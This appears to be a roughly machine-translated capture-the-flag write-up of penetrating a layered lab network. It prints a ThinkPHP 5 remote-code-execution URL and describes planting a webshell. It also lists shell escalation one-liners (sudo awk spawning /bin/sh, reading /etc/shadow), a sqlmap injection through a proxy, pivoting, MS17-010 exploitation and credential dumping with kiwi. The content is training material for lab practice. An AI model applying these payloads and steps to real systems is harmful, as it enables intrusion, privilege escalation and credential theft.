Virtual network card configuration
Environmental issues:
- The virtual machine bridge cannot obtain the IP address, so it can be solved by restoring the default settings and specifying the physical network card
- For target machine 1, the internal network card cannot obtain the IP address, which is solved by adding configuration files.
Start to penetrate:
Times: 192.168.1.13
Centos7: 192.168.1.16
192.168.22.11
Scan port
Use nmap to scan for vulnerabilities
nmap -sS -A 192.168.101.91 --script=vuln
Slow, no screenshots
Visit 80
Test for unauthorized access to the pagoda, non-existent
Check robots.txt to find flag1
Baidu searches for thinkphp v5 vulnerabilities and finds remote code execution vulnerabilities
https://www.cnblogs.com/backlion/p/10106676.html
http://192.168.1.16/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Use the command to execute and see flag2:
Write a sentence Trojan
The third flag was found when using the command to execute the Trojan looking for writing
Changed a new payload to write one sentence Trojan shy.php, the previous one was written successfully, but the path was not found
Use a chopper to connect
collect message:
1,uname -a
Linux 3.10.0-1062.1.1.el7.x86_64 x86_64
Kernel version: 3
Major revision: 10
0-1062: minor revision
- Patch version
2,hostnamectl
Centos 7 x86
According to the collected information, use msf to generate related payload
Use the chopper to upload the generated Trojan file
Chopper give permission and run
Msf received shell
Pyhotn -c'import pty; pty.spawn("/bin/bash")' to establish an interactive shell
Attempt to suid privilege:
find / -user root –perm -4000 -print 2>/dev/null
Check whether passwd shadow is writable
How to write, replace the root password X of passwd with our own hash, such as replacing it with the hash in your own linux, you can modify the root password of the target
Whether Shadow is readable, it can be blasted if it is readable
Is Sudo abuse? The problem is that I don’t even know the password of the www user. Can I change my password? I just tested it.
sudo is a command that allows ordinary users to use super users. The configuration file is /etc/sudoers. The file defines the account that can execute sudo, defines the root access of an application, and whether password authentication is required.
Check which commands can be executed, that is, when you don’t need to know the root password, you need to verify your own password of ordinary authority
sudo awk 'BEGIN {system("/bin/sh")}'
sudo man man
sudo curl file:///etc/shadow
https://gtfobins.github.io/
View scheduled tasks: also no
Kernel stack overflow privilege escalation
Forget it, don’t mention rights, and direct intranet penetration
Check that the IP exists in 22 network segments
Add route
Set up proxy
Test whether the proxy is set up successfully, but it cannot be pinged (not in the same network segment), but it can be accessed, the proxy setting is successful
Use nmap to scan and find the surviving host 22.22 in the 22 network segment of the intranet
Use nmap for detailed scanning
Found that port 80 is opened, and Firefox is configured with proxy
Access port 80
Tips found in the source code
Start running
proxychains sqlmap -u "192.168.22.22/index.php?r=vul&keyword=1" -p keyword
Violent library
Burst table
Burst field
Cracked code
Robots file found backstage address
Log in to the background to find the flag
Then I stuck in the background for a long time, why there are too many points to use, file upload, database backup, database command execution, cause. . . It took a long time
Back-end management to modify the template (this place has been stuck for a long time, new creation, or modification in other files will not work, you have to modify it in the index file, and then let it run automatically)
Access using phpinfo() to get the root directory of the website
http://192.168.22.22/index.php?r=tag
Configure the agent on the physical machine, because kali cannot use the chopper
Use proxy tools
Use a chopper to connect
Using the chopper virtual terminal, it turns out that there is still a 33 network segment
Information collection ubuntu x86
Use msf to generate the backdoor file, because this server is located in the intranet, not a border machine, and cannot access our attack machine, so reverse_tcp reverse link cannot be used, only bind_tcp, forward connection, bind_tcp will open one on the server Port, msf actively connects to this port. As for what port to open is determined when the attacker msf generates the backdoor file.
Generate
And upload the chopper to the 22.22 machine
Msf configuration monitoring (note: the port here must be the same as the port when generating)
Run on the chopper, msf gets the shell
Found that there is a 33 network segment
Add route
Scanning for surviving hosts, by specifying a few ports, found that the intranet surviving host 33.33
Scan 33.33 open ports individually
Open port 445, directly use msf17_010
Load kiwi module load kiwi
help kiwi view help
creds_all enumerate all credentials
New user
Successfully logged in